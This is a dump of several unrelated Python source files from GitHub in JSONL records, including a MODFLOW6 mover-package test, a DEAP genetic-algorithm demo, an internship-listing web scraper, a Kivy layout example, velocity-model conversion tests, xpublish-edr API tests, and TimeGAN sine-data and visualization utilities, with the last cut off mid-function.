MOVER PACKAGE (MVR) FLOW RATES \"\n sim_srch_str = \" WATER MOVER PACKAGE (MVR) FLOW RATES \"\n for idx, (cur_ws, gwfparent) in enumerate(zip(sim_workspaces, gwf_names)):\n with open(\n os.path.join(cur_ws, gwfparent + \".lst\"), \"r\"\n ) as gwf_lst, open(os.path.join(cur_ws, \"mfsim.lst\"), \"r\") as sim_lst:\n gwf_lst_lines = gwf_lst.readlines()\n sim_lst_lines = sim_lst.readlines()\n\n # Convert lists of lines to iterable objects\n gwf_lst = iter(gwf_lst_lines)\n sim_lst = iter(sim_lst_lines)\n\n # Peel mvr values from gwf lst file to be compared between scenarios\n done = False\n for line in gwf_lst:\n # adv file pointer to search line\n if gwf_srch_str1 in line:\n # once at the identified line, continue searching until sfr obj 17 queued\n while True:\n line = next(gwf_lst)\n m_arr = line.strip().split()\n if m_arr[0] == \"18\":\n # store the 3rd value on the line (it should be the same across all scenarios\n parent_sfr_last_reach_flow.append(float(m_arr[2]))\n break\n\n # the second search string will only appear in the 50/50 and 75/25 scenarios\n if gwf_srch_str2 in line and idx > 0:\n # once at srch_str2, continue searching until 2nd mvr connection queued\n while True:\n line = next(gwf_lst)\n m_arr = line.strip().split()\n if m_arr[0] == \"2\":\n parent_sfr_mvr_amount.append(float(m_arr[4]))\n done = True\n break\n\n if done:\n break\n\n # now cycle through the simulation lst file\n # only the 50/50 and 75/25 scenarios will have the descired line\n if 
idx > 0:\n for line in sim_lst:\n if sim_srch_str in line:\n while True:\n line = next(sim_lst)\n m_arr = line.strip().split()\n if m_arr[0] == \"3\":\n sim_mvr_amount.append(float(m_arr[4]))\n done = True\n break\n\n # perform the comparisons:\n # o check flow entering last reach of parent model\n # - should be the same across all 3 simulation\n # - for current version of model, this amount was roughly 214.25\n # o check the relative proportion of flows between gwf- and\n # simulation-level mvrs\n # - 50/50: ~107 units of flow in each\n # - 75/25: 75% goes through the gwf mvr, 25% through the simulation mvr\n for i in np.arange(len(parent_sfr_mvr_amount) - 1):\n assert math.isclose(\n parent_sfr_last_reach_flow[i],\n parent_sfr_last_reach_flow[i + 1],\n rel_tol=0.1,\n ), (\n \"Flow in the last reach of scenario \"\n + mvr_scens[i]\n + \" = \"\n + str(parent_sfr_last_reach_flow[i])\n + \", whereas the flow in scenario \"\n + mvr_scens[i + 1]\n + \" = \"\n + str(parent_sfr_last_reach_flow[i + 1])\n + \". Something changed, quitting.\"\n )\n\n # 50/50\n gwf_transferred_50 = parent_sfr_mvr_amount[0] / (\n parent_sfr_mvr_amount[0] + sim_mvr_amount[0]\n )\n sim_transferred_50 = sim_mvr_amount[0] / (\n parent_sfr_mvr_amount[0] + sim_mvr_amount[0]\n )\n assert np.allclose(\n np.array([gwf_transferred_50, sim_transferred_50]),\n np.array([0.5, 0.5]),\n rtol=0.1,\n ), \"There should be a 50/50 split in the amount of water transferred by the GWF- and simulation-level MVRs.\"\n\n # 75/25\n gwf_transferred_75 = parent_sfr_mvr_amount[1] / (\n parent_sfr_mvr_amount[1] + sim_mvr_amount[1]\n )\n sim_transferred_75 = sim_mvr_amount[1] / (\n parent_sfr_mvr_amount[1] + sim_mvr_amount[1]\n )\n assert np.allclose(\n np.array([gwf_transferred_75, sim_transferred_75]),\n np.array([0.75, 0.25]),\n rtol=0.1,\n ), \"There should be a 75/25 split in the amount of water transferred by the GWF- and simulation-level MVRs.\"\n\n\n# - No need to change any code below\ndef test_mf6model():\n # initialize testing framework\n test = testing_framework()\n\n # build the models\n build_and_run_simulations()\n\n # Check scenario output\n # evaluate list file output to ensure total flows are similar\n # no matter what the mvr connection setup is (i.e., simulation-level\n # mvr vs gwf-level mvr) or what the relative fraction between the\n # different level mvrs is.\n check_simulation_output()\n\n return\n\n\ndef main():\n # initialize testing framework\n test = testing_framework()\n\n # build the models\n build_and_run_simulations()\n\n # Check scenario output\n # evaluate list file output to ensure total flows are similar\n # no matter what the mvr connection setup is (i.e., simulation-level\n # mvr vs gwf-level mvr) or what the relative fraction between the\n # different level mvrs is.\n check_simulation_output()\n\n return\n\n\nif __name__ == \"__main__\":\n # print message\n print(\"standalone run of {}\".format(os.path.basename(__file__)))\n\n # run main routine\n main()\n","repo_name":"VB6Hobbyst7/modflow6","sub_path":"autotest/test_gwf_multimvr.py","file_name":"test_gwf_multimvr.py","file_ext":"py","file_size_in_byte":28555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"70932481371","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThe problem is very simple, we search for a 1 filled solution\n\"\"\"\nfrom __future__ import division\n\nimport random\nfrom deap import base, creator, tools, algorithms\n\n# Type creation (default: Fitness and individual)\n# 
#################################################################\n# Create Fitness\n# Maximizing --> replacing virtual weights by attribute 1.0;\ncreator.create(\"FitnessMax\", base.Fitness, weights=(1.0,))\n\n# Alternative: creator.create(\"FitnessMin\", base.Fitness, weights=(-1.0,))\n\n# Creates individual, inheritance of list\n# Holds fitnesss value of FitnessMax type\ncreator.create(\"Individual\", list, fitness=creator.FitnessMax)\n\n# Created classes are made available in creater module\n\n# Initialize objects of new classes\n# ################################################################\nind = creator.Individual([1, 0, 1, 1, 0])\n\nprint(ind)\nprint(type(ind))\nprint(type(ind.fitness))\nprint()\n\n# Toolbox\n# ################################################################\n# Container holding functions, that are stored under their name aliases\n\ntoolbox = base.Toolbox()\n\n# Function to call random integer between 0 and 1\ntoolbox.register(\"attr_bool\", random.randint, 0, 1)\n\n# Uses tools.initRepeat to fill individual with random 0, 1 integers\ntoolbox.register(\"individual\", tools.initRepeat,\n creator.Individual, toolbox.attr_bool, n=10)\n\n# Generate population of individuals\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n\nbit = toolbox.attr_bool()\nind = toolbox.individual()\npop = toolbox.population(n=3)\n\nprint(\"bit is of type %s and has value\\n%s\" % (type(bit), bit))\nprint(\n \"ind is of type %s and contains %d bits\\n%s\" % (type(ind), len(ind), ind))\nprint(\"pop is of type %s and contains %d individuals\\n%s\" % (\ntype(pop), len(pop), pop))\nprint()\n\n# Evaluate function\n# ################################################################\n\n# Count nb of 1 in individual\ndef evalOneMax(individual):\n return sum(individual),\n\n# Genetic Operators\n# ################################################################\n# Registering the operators and their default arguments in the toolbox\n\ntoolbox.register(\"evaluate\", evalOneMax)\ntoolbox.register(\"mate\", tools.cxTwoPoint)\n\n# indpb: Probability of each attribute to be mutated\ntoolbox.register(\"mutate\", tools.mutFlipBit, indpb=0.10)\ntoolbox.register(\"select\", tools.selTournament, tournsize=3)\n\nind = toolbox.individual()\nprint(ind)\ntoolbox.mutate(ind)\nprint(ind)\n\nmutant = toolbox.clone(ind)\nprint(mutant is ind)\nprint(mutant == ind)\n\n# Evolving the population\n# ################################################################\n\ndef main():\n import numpy\n\n pop = toolbox.population(n=50)\n hof = tools.HallOfFame(1)\n stats = tools.Statistics(lambda ind: ind.fitness.values)\n stats.register(\"avg\", numpy.mean)\n stats.register(\"min\", numpy.min)\n stats.register(\"max\", numpy.max)\n\n pop, logbook = algorithms.eaSimple(pop, toolbox, cxpb=0.5, mutpb=0.2,\n ngen=10, stats=stats, halloffame=hof,\n verbose=True)\n\n return pop, logbook, hof\n\n\nif __name__ == \"__main__\":\n pop, log, hof = main()\n print(\n \"Best individual is: %s\\nwith fitness: %s\" % (hof[0], hof[0].fitness))\n\n import matplotlib.pyplot as plt\n\n gen, avg, min_, max_ = log.select(\"gen\", \"avg\", \"min\", \"max\")\n plt.plot(gen, avg, label=\"average\")\n plt.plot(gen, min_, label=\"minimum\")\n plt.plot(gen, max_, label=\"maximum\")\n plt.xlabel(\"Generation\")\n plt.ylabel(\"Fitness\")\n plt.legend(loc=\"lower right\")\n 
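# Optionally persist the figure before displaying it; a minimal sketch using\n    # matplotlib's standard API, with an illustrative filename (not part of the\n    # original script):\n    # plt.savefig(\"onemax_fitness.png\", dpi=150)\n    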
plt.show()","repo_name":"RWTH-EBC/pyCity_resilience","sub_path":"pycity_resilience/others/deap_experiments/j_notebook.py","file_name":"j_notebook.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"73916357210","text":"import requests\nimport random\nimport json\nimport pprint\nimport re\nimport csv\n\nfrom get_proxy import proxys\nfrom configs import headers, cookies, city_codes\nfrom bs4 import BeautifulSoup\n\n\nclass Internship_spider():\n base_url = \"http://www.shixiseng.com/interns/\"\n new_city_codes = {v: k for k, v in city_codes.items()}\n\n def __init__(self, keyword, city):\n self.keyword = keyword\n self.city = city + \"市\"\n\n def __get_uuids(self):\n city_code = Internship_spider.new_city_codes[self.city]\n p = 1\n uuids = []\n while True:\n url = Internship_spider.base_url + \"c-\" + \\\n city_code + \"_?k=\" + self.keyword + \"&p=\" + str(p)\n htmls = requests.get(url, headers=random.choice(\n headers), cookies=cookies, proxies=random.choice(proxys)).text\n soup = BeautifulSoup(htmls, \"html5lib\")\n links = soup.select(\".position-list li .name-box a\")\n if len(links) == 0:\n break\n for link in links:\n uuids.append(link.get('data-info'))\n p += 1\n return uuids\n\n def __analysis(self, uuids):\n intern_urls = []\n for uuid in uuids:\n intern_urls.append(\n \"https://wap.shixiseng.com/app/intern/info?uuid=\" + uuid)\n internships = []\n for intern_url in intern_urls:\n unicode_strs = requests.get(intern_url, headers=random.choice(\n headers), cookies=cookies, proxies=random.choice(proxys)).text\n htmls = unicode_strs.encode('latin-1').decode('unicode_escape')\n title = str(re.findall('\"iname\"\\:([\\s\\S]*?)\\,', htmls))[4:-3]\n company = {\"company_name\": str(re.findall('\"cname\"\\:([\\s\\S]*?)\\,', htmls))[4:-3],\n \"industry\": str(re.findall('\"industry\"\\:([\\s\\S]*?)\\,', htmls))[4:-3],\n \"scale\": str(re.findall('\"scale\"\\:([\\s\\S]*?)\\,', htmls))[4:-3]\n }\n salary = str(re.findall('\"minsal\"\\:([\\s\\S]*?)\\,', htmls))[4:-3] + \"-\" + str(\n re.findall('\"maxsal\"\\:([\\s\\S]*?)\\,', htmls))[4:-3]\n frequency = str(re.findall(\n '\"day\"\\:([\\s\\S]*?)\\,', htmls))[3:-2] + '天每周'\n month = str(re.findall(\n '\"month\"\\:([\\s\\S]*?)\\,', htmls))[3:-2] + '个月'\n address = str(re.findall('\"address\"\\:([\\s\\S]*?)\\,', htmls))[4:-3]\n degree = str(re.findall('\"degree\"\\:([\\s\\S]*?)\\,', htmls))[4:-3]\n refresh_time = str(re.findall(\n '\"refresh\"\\:([\\s\\S]*?)\\,', htmls))[4:-3]\n info = [title, company, salary, frequency,\n month, address, degree, refresh_time]\n internships.append(info)\n return internships\n\n def __save(self, internships):\n f = open(\"internship_data.csv\", \"a\")\n writer = csv.writer(f)\n writer.writerows(internships)\n f.close()\n\n def go(self):\n uuids = self.__get_uuids()\n internships = self.__analysis(uuids)\n self.__save(internships)\n\n\nspider = Internship_spider(\"Python\", \"北京\")\nspider.go()\n","repo_name":"hellen931126/job_spider","sub_path":"internship_spider.py","file_name":"internship_spider.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4949463505","text":"from kivy.app import App\r\nfrom kivy.uix.button import Button\r\nfrom kivy.uix.gridlayout import GridLayout\r\n\r\nclass Ornek(App):\r\n def build(self):\r\n\r\n govde = GridLayout(cols = 2)\r\n # Azami 2 sütundan oluşmasını istedik\r\n # 2 
sütundan sonra alta kayacak.\r\n\r\n # Birden fazla buton ekleyip nasıl görünecek\r\n # for döngüsü ile ekleyelim\r\n\r\n for i in range(10):\r\n if (i%2 == 0):\r\n # Aynı sütuna denk gelenler için\r\n govde.add_widget(Button(text = \"{}\".format(i+1),\r\n size_hint_x = .4))\r\n else:\r\n govde.add_widget(Button(text = \"{}\".format(i+1)))\r\n\r\n return govde\r\n\r\nOrnek().run()\r\n\r\n","repo_name":"bgr8/Python-Projeleri","sub_path":"Kivy/3.Pencere Düzenleri/3.GridLayout/gridlayout.py","file_name":"gridlayout.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30944025724","text":"from __future__ import division, print_function\n\n# Import Python modules\nimport os\n\n# Import BBP modules\nimport vm2vm\nimport seqnum\nimport filecmp\nimport unittest\nimport bband_utils\nfrom install_cfg import InstallCfg\n\nclass TestVm2vm(unittest.TestCase):\n \"\"\"\n Unit tests for the velocity model conversion codes\n \"\"\"\n def setUp(self):\n \"\"\"\n Copy needed files to run the test\n \"\"\"\n self.install = InstallCfg()\n self.sim_id = int(seqnum.get_seq_num())\n self.a_tmpdir = os.path.join(self.install.A_TMP_DATA_DIR, str(self.sim_id))\n self.a_ucsb_refdir = os.path.join(self.install.A_TEST_REF_DIR, \"ucsb\")\n self.a_sdsu_refdir = os.path.join(self.install.A_TEST_REF_DIR, \"sdsu\")\n self.a_gp_refdir = os.path.join(self.install.A_TEST_REF_DIR, \"gp\")\n\n #\n # Make sure output directories exist\n #\n bband_utils.mkdirs([self.a_tmpdir])\n\n def test_vm2vm(self):\n \"\"\"\n input a GP format file and get out a SDSU format file\n \"\"\"\n gpfile = os.path.join(self.a_sdsu_refdir, \"gp_velmodel.v1d\")\n sdsufile = os.path.join(self.a_tmpdir, \"gp_velmodel.sdsu\")\n sdsuref = os.path.join(self.a_sdsu_refdir, \"sdsu_velmodel.ref\")\n _ = vm2vm.gpvm2sdsuvm(gpfile, sdsufile)\n errmsg = \"Conversion of velmodel from GP to SDSU failed\"\n self.failIf(filecmp.cmp(sdsuref, sdsufile) == False, errmsg)\n\n def test_vm2vm_nga(self):\n \"\"\"\n input a GP format file and get out a SDSU format file\n \"\"\"\n gpfile = os.path.join(self.a_gp_refdir, \"nga_rock1.v1d\")\n sdsufile = os.path.join(self.a_tmpdir, \"sdsu_nga_rock1.v1d\")\n sdsuref = os.path.join(self.a_sdsu_refdir, \"sdsu_nga_rock1.v1d\")\n _ = vm2vm.gpvm2sdsuvm(gpfile, sdsufile)\n errmsg = \"Conversion of velmodel from GP to SDSU failed\"\n self.failIf(filecmp.cmp(sdsuref, sdsufile) == False, errmsg)\n\n def test_vm2ucsb(self):\n \"\"\"\n input a GP format file and get out a UCSB format file\n \"\"\"\n gpfile = os.path.join(self.a_ucsb_refdir, \"gp_velocity_model.txt\")\n ofile = os.path.join(self.a_tmpdir, \"ucsb_velocity_model.txt\")\n ucsbref = os.path.join(self.a_ucsb_refdir, \"ucsb_velocity_model.txt\")\n _ = vm2vm.gpvm2ucsbvm(gpfile, ofile)\n errmsg = \"Conversion of velmodel from GP to UCSB ffailed\"\n self.failIf(filecmp.cmp(ucsbref, ofile) == False, errmsg)\n\n def test_vm2ucsb_nga(self):\n \"\"\"\n input a GP format file and get out a UCSB format file\n \"\"\"\n gpfile = os.path.join(self.a_gp_refdir, \"nga_rock1.v1d\")\n ofile = os.path.join(self.a_tmpdir, \"ucsb_nga_rock1.v1d\")\n ucsbref = os.path.join(self.a_ucsb_refdir, \"ucsb_nga_rock1.v1d\")\n _ = vm2vm.gpvm2ucsbvm(gpfile, ofile)\n errmsg = \"Conversion of velmodel from GP to UCSB ffailed\"\n self.failIf(filecmp.cmp(ucsbref, ofile) == False, errmsg)\n\nif __name__ == '__main__':\n SUITE = unittest.TestLoader().loadTestsFromTestCase(TestVm2vm)\n 
unittest.TextTestRunner(verbosity=2).run(SUITE)\n","repo_name":"UWGeotech/bbpUW","sub_path":"bbp/tests/test_vm2vm.py","file_name":"test_vm2vm.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41731646646","text":"import pytest\nimport xpublish\nfrom fastapi.testclient import TestClient\n\nfrom xpublish_edr import CfEdrPlugin\n\n\n@pytest.fixture(scope=\"session\")\ndef cf_dataset():\n from cf_xarray.datasets import airds\n\n return airds\n\n\n@pytest.fixture(scope=\"session\")\ndef cf_xpublish(cf_dataset):\n rest = xpublish.Rest({\"air\": cf_dataset}, plugins={\"edr\": CfEdrPlugin()})\n\n return rest\n\n\n@pytest.fixture(scope=\"session\")\ndef cf_client(cf_xpublish):\n app = cf_xpublish.app\n client = TestClient(app)\n\n return client\n\n\ndef test_cf_position_formats(cf_client):\n response = cf_client.get(\"/edr/position/formats\")\n\n assert response.status_code == 200, \"Response did not return successfully\"\n\n data = response.json()\n\n assert \"cf_covjson\" in data, \"cf_covjson is not a valid format\"\n assert \"nc\" in data, \"nc is not a valid format\"\n assert \"csv\" in data, \"csv is not a valid format\"\n\n\ndef test_cf_position_query(cf_client, cf_dataset):\n x = 204\n y = 44\n response = cf_client.get(f\"/datasets/air/edr/position?coords=POINT({x} {y})\")\n\n assert response.status_code == 200, \"Response did not return successfully\"\n\n data = response.json()\n\n for key in (\"type\", \"domain\", \"parameters\", \"ranges\"):\n assert key in data, f\"Key {key} is not a top level key in the CovJSON response\"\n\n axes = data[\"domain\"][\"axes\"]\n\n assert axes[\"x\"] == {\"values\": [205.0]}, \"Did not select nearby x coordinate\"\n assert axes[\"y\"] == {\"values\": [45.0]}, \"Did not select a nearby y coordinate\"\n\n assert (\n len(axes[\"t\"][\"values\"]) == 4\n ), \"There should be a time value for each time step\"\n\n air_param = data[\"parameters\"][\"air\"]\n\n assert (\n air_param[\"unit\"][\"label\"][\"en\"] == cf_dataset[\"air\"].attrs[\"units\"]\n ), \"DataArray units should be set as parameter units\"\n assert (\n air_param[\"observedProperty\"][\"id\"] == cf_dataset[\"air\"].attrs[\"standard_name\"]\n ), \"DataArray standard_name should be set as the observed property id\"\n assert (\n air_param[\"observedProperty\"][\"label\"][\"en\"]\n == cf_dataset[\"air\"].attrs[\"long_name\"]\n ), \"DataArray long_name should be set as parameter observed property\"\n assert (\n air_param[\"description\"][\"en\"] == cf_dataset[\"air\"].attrs[\"long_name\"]\n ), \"DataArray long_name should be set as parameter description\"\n\n air_range = data[\"ranges\"][\"air\"]\n\n assert air_range[\"type\"] == \"NdArray\", \"Response range should be a NdArray\"\n assert air_range[\"dataType\"] == \"float\", \"Air dataType should be floats\"\n assert air_range[\"axisNames\"] == [\"t\"], \"Time should be the only remaining axes\"\n assert len(air_range[\"shape\"]) == 1, \"There should only one axes\"\n assert air_range[\"shape\"][0] == len(axes[\"t\"][\"values\"]), \"The shape of the \"\n assert (\n len(air_range[\"values\"]) == 4\n ), \"There should be 4 values, one for each time step\"\n\n\ndef test_cf_position_csv(cf_client):\n x = 204\n y = 44\n response = cf_client.get(f\"/datasets/air/edr/position?coords=POINT({x} {y})&f=csv\")\n\n assert response.status_code == 200, \"Response did not return successfully\"\n assert (\n \"text/csv\" in response.headers[\"content-type\"]\n ), 
\"The content type should be set as a CSV\"\n assert (\n \"attachment\" in response.headers[\"content-disposition\"]\n ), \"The response should be set as an attachment to trigger download\"\n assert (\n \"position.csv\" in response.headers[\"content-disposition\"]\n ), \"The file name should be position.csv\"\n\n csv_data = [\n line.split(\",\") for line in response.content.decode(\"utf-8\").splitlines()\n ]\n\n assert (\n len(csv_data) == 5\n ), \"There should be 4 data rows (one for each time step), and one header row\"\n for key in (\"time\", \"lat\", \"lon\", \"air\", \"cell_area\"):\n assert key in csv_data[0], f\"column {key} should be in the header\"\n\n\ndef test_cf_position_nc(cf_client):\n x = 204\n y = 44\n response = cf_client.get(f\"/datasets/air/edr/position?coords=POINT({x} {y})&f=nc\")\n\n assert response.status_code == 200, \"Response did not return successfully\"\n assert (\n \"application/netcdf\" in response.headers[\"content-type\"]\n ), \"The content type should be set as a NetCDF\"\n assert (\n \"attachment\" in response.headers[\"content-disposition\"]\n ), \"The response should be set as an attachment to trigger download\"\n assert (\n \"position.nc\" in response.headers[\"content-disposition\"]\n ), \"The file name should be position.nc\"\n\n\ndef test_percent_encoded_cf_position_nc(cf_client):\n x = 204\n y = 44\n response = cf_client.get(f\"/datasets/air/edr/position?coords=POINT({x}%20{y})&f=nc\")\n\n assert response.status_code == 200, \"Response did not return successfully\"\n assert (\n \"application/netcdf\" in response.headers[\"content-type\"]\n ), \"The content type should be set as a NetCDF\"\n assert (\n \"attachment\" in response.headers[\"content-disposition\"]\n ), \"The response should be set as an attachment to trigger download\"\n assert (\n \"position.nc\" in response.headers[\"content-disposition\"]\n ), \"The file name should be position.nc\"\n","repo_name":"xpublish-community/xpublish-edr","sub_path":"tests/test_cf_router.py","file_name":"test_cf_router.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"28401639479","text":"import numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport umap\n\n\nclass minmaxscaler:\n def __init__(self):\n self.matrix_min = None\n self.matrix_max = None\n self.denom = None\n\n def fit(self, X):\n self.matrix_min = X.min(axis=1, keepdims=True).values\n self.matrix_max = X.max(axis=1, keepdims=True).values\n self.denom = self.matrix_max - self.matrix_min\n\n def fit_transform(self, X):\n self.fit(X)\n return self.transform(X)\n\n def transform(self, X):\n return (X - self.matrix_min) / self.denom\n\n def inverse_transform(self, X):\n return X * self.denom + self.matrix_min\n\n\ndef create_sin3(sin1, sin2, alpha, noise):\n seq_len = len(sin1)\n importance = np.array([alpha ** i for i in range(seq_len)])\n\n if alpha < 1:\n sin3 = []\n for i in range(1, seq_len + 1):\n sin3.append(((importance[:i][::-1] * sin1[:i] + importance[:i][::-1] * sin2[:i]) / 2).sum())\n sin3 = np.array(sin3)\n else:\n sin3 = (sin1 + sin2) / 2\n\n #if noise > 0:\n # sin3 = np.array(sin3) + np.random.normal(0, noise, seq_len)\n\n return sin3\n\n\ndef sine_data_generation(no, seq_len, alpha, noise, s1_freq, s2_freq, s1_phase, s2_phase):\n \"\"\"Sine data generation.\n\n Args:\n - no: the number of samples\n - seq_len: sequence length of the time-series\n - dim: feature dimensions\n - temporal: whether to add temporal 
information\n\n Returns:\n - data: generated data\n \"\"\"\n # Initialize the output\n data = list()\n # Generate sine data\n for i in range(no):\n # Initialize each time-series\n\n t = np.linspace(0, 2*np.pi, seq_len)\n #t = np.arange(seq_len)\n # Randomly drawn frequency and phase\n\n freq1 = np.random.uniform(s1_freq[0], s1_freq[1])\n phase1 = np.random.uniform(s1_phase[0], s1_phase[1])\n sin1 = np.sin(t * freq1 + phase1)\n\n freq2 = np.random.uniform(s2_freq[0], s2_freq[1])\n phase2 = np.random.uniform(s2_phase[0], s2_phase[1])\n sin2 = np.sin(t * freq2 + phase2)\n\n if noise > 0:\n sin1 = sin1 + np.random.normal(0, noise, seq_len)\n sin2 = sin2 + np.random.normal(0, noise, seq_len)\n\n sin3 = create_sin3(sin1, sin2, alpha=alpha, noise=noise)\n sinuses = np.array([sin1, sin2, sin3])\n # Align row/column\n temp = torch.tensor(sinuses).transpose(0, 1)\n # Normalize to [0,1]\n # temp = (temp + 1) * 0.5\n # Stack the generated data\n data.append(temp)\n\n return torch.stack(data)\n\n\nclass DatasetSinus(torch.utils.data.Dataset):\n \"\"\"TimeGAN Dataset for sampling data with their respective time\n Args:\n - data (numpy.ndarray): the padded dataset to be fitted (D x S x F)\n - time (numpy.ndarray): the length of each data (D)\n Parameters:\n - x (torch.FloatTensor): the real value features of the data\n - t (torch.LongTensor): the temporal feature of the data\n \"\"\"\n\n def __init__(self, num, seq_len, alpha, noise, s1_freq=None, s2_freq=None, s1_phase=None, s2_phase=None):\n \"\"\"Initialize the dataset\n Optinal args:\n s1_freq, s2_freq, s1_phase, s2_phase: list of two floats, [min, max]\n \"\"\"\n # standard sine waves\n if s1_freq is None:\n s1_freq = [1, 3]\n #s1_freq = [0.05, 0.15]\n if s2_freq is None:\n s2_freq = [4, 6]\n #s2_freq = [0.3, 0.4]\n if s1_phase is None:\n s1_phase = [-np.pi/2, 0]\n #s1_phase = [-np.pi / 2, 0]\n if s2_phase is None:\n s2_phase = [0, np.pi/2]\n #s2_phase = [0, np.pi / 2]\n\n print(f\"sin1 freq:{s1_freq}, phase:{s1_phase}\")\n print(f\"sin2 freq:{s2_freq}, phase:{s2_phase}\")\n\n\n self.X_raw = sine_data_generation(num, seq_len, alpha, noise,\n s1_freq, s2_freq, s1_phase, s2_phase)\n self.X_scaler = minmaxscaler()\n self.X = self.X_scaler.fit_transform(self.X_raw)\n # self.X = torch.tensor(sine_data_generation(num, seq_len, features, temporal=temporal),\n # dtype=torch.float32).clone().detach_()\n self.T = [x.size(0) for x in self.X]\n\n def __len__(self):\n return len(self.X)\n\n def __getitem__(self, idx):\n return self.X[idx].float(), self.T[idx]\n\n def collate_fn(self, batch):\n \"\"\"Minibatch sampling\n \"\"\"\n # Pad sequences to max length\n X_mb = [X for X in batch[0]]\n\n # The actual length of each data\n T_mb = [T for T in batch[1]]\n\n return X_mb, T_mb\n\n\nclass DatasetStocks(torch.utils.data.Dataset):\n \"\"\"TimeGAN Dataset for sampling data with their respective time\n Args:\n - data (numpy.ndarray): the padded dataset to be fitted (D x S x F)\n - time (numpy.ndarray): the length of each data (D)\n Parameters:\n - x (torch.FloatTensor): the real value features of the data\n - t (torch.LongTensor): the temporal feature of the data\n \"\"\"\n\n def __init__(self, data):\n # sanity check\n self.X = data\n self.T = [x.size(0) for x in self.X]\n\n def __len__(self):\n return len(self.X)\n\n def __getitem__(self, idx):\n return self.X[idx].float(), self.T[idx]\n\n def collate_fn(self, batch):\n \"\"\"Minibatch sampling\n \"\"\"\n # Pad sequences to max length\n X_mb = [X for X in batch[0]]\n\n # The actual length of each data\n T_mb = [T 
for T in batch[1]]\n\n return X_mb, T_mb\n\n\n#######################################################################\n# Visualization\n\n# Commented out IPython magic to ensure Python compatibility.\nfrom sklearn.manifold import TSNE\nfrom sklearn.decomposition import PCA\n\n\ndef visualization(ori_data, generated_data, analysis):\n \"\"\"Using PCA or tSNE for generated and original data visualization.\n\n Args:\n - ori_data: original data\n - generated_data: generated synthetic data\n - analysis: tsne or pca\n \"\"\"\n # Analysis sample size (for faster computation)\n anal_sample_no = min([1000, len(ori_data)])\n idx = np.random.permutation(len(ori_data))[:anal_sample_no]\n\n # Data preprocessing\n ori_data = np.asarray(ori_data)\n generated_data = np.asarray(generated_data)\n\n ori_data = ori_data[idx]\n generated_data = generated_data[idx]\n\n no, seq_len, dim = ori_data.shape\n\n for i in range(anal_sample_no):\n if (i == 0):\n prep_data = np.reshape(np.mean(ori_data[0, :, :], 1), [1, seq_len])\n prep_data_hat = np.reshape(np.mean(generated_data[0, :, :], 1), [1, seq_len])\n else:\n prep_data = np.concatenate((prep_data,\n np.reshape(np.mean(ori_data[i, :, :], 1), [1, seq_len])))\n prep_data_hat = np.concatenate((prep_data_hat,\n np.reshape(np.mean(generated_data[i, :, :], 1), [1, seq_len])))\n\n # Visualization parameter\n colors = [\"tab:blue\" for i in range(anal_sample_no)] + [\"tab:orange\" for i in range(anal_sample_no)]\n\n if analysis == 'pca':\n # PCA Analysis\n pca = PCA(n_components=2)\n pca.fit(prep_data)\n pca_results = pca.transform(prep_data)\n pca_hat_results = pca.transform(prep_data_hat)\n\n # Plotting\n f, ax = plt.subplots(1)\n plt.scatter(pca_results[:, 0], pca_results[:, 1],\n c=colors[:anal_sample_no], alpha=0.2, label=\"Original\")\n plt.scatter(pca_hat_results[:, 0], pca_hat_results[:, 1],\n c=colors[anal_sample_no:], alpha=0.2, label=\"Synthetic\")\n\n ax.legend()\n plt.title('PCA plot')\n plt.xlabel('x-pca')\n plt.ylabel('y_pca')\n # plt.show()\n return f\n\n elif analysis == 'tsne':\n\n # Do t-SNE Analysis together\n prep_data_final = np.concatenate((prep_data, prep_data_hat), axis=0)\n\n # TSNE anlaysis\n tsne = TSNE(n_components=2, verbose=0, perplexity=40, n_iter=300)\n tsne_results = tsne.fit_transform(prep_data_final)\n\n # Plotting\n f, ax = plt.subplots(1)\n\n plt.scatter(tsne_results[:anal_sample_no, 0], tsne_results[:anal_sample_no, 1],\n c=colors[:anal_sample_no], alpha=0.2, label=\"Original\")\n plt.scatter(tsne_results[anal_sample_no:, 0], tsne_results[anal_sample_no:, 1],\n c=colors[anal_sample_no:], alpha=0.2, label=\"Synthetic\")\n\n ax.legend()\n\n plt.title('t-SNE plot')\n plt.xlabel('x-tsne')\n plt.ylabel('y_tsne')\n # plt.show()\n return f\n elif analysis == 'umap':\n\n prep_data_final = np.concatenate((prep_data, prep_data_hat), axis=0)\n reducer = umap.UMAP()\n embedding = reducer.fit_transform(prep_data_final)\n f, ax = plt.subplots(1)\n\n plt.scatter(embedding[:anal_sample_no, 0], embedding[:anal_sample_no, 1],\n c=colors[:anal_sample_no], alpha=0.2, label=\"Original\")\n plt.scatter(embedding[anal_sample_no:, 0], embedding[anal_sample_no:, 1],\n c=colors[anal_sample_no:], alpha=0.2, label=\"Synthetic\")\n\n ax.legend()\n\n plt.title('UMAP plot')\n plt.xlabel('x-umap')\n plt.ylabel('y_umap')\n # plt.show()\n return f\n\n\ndef modeCollapseEvaluator(ori_data, generated_data):\n # Analysis sample size (for faster computation)\n anal_sample_no = min([1000, len(ori_data)])\n idx = np.random.permutation(len(ori_data))[:anal_sample_no]\n\n # 
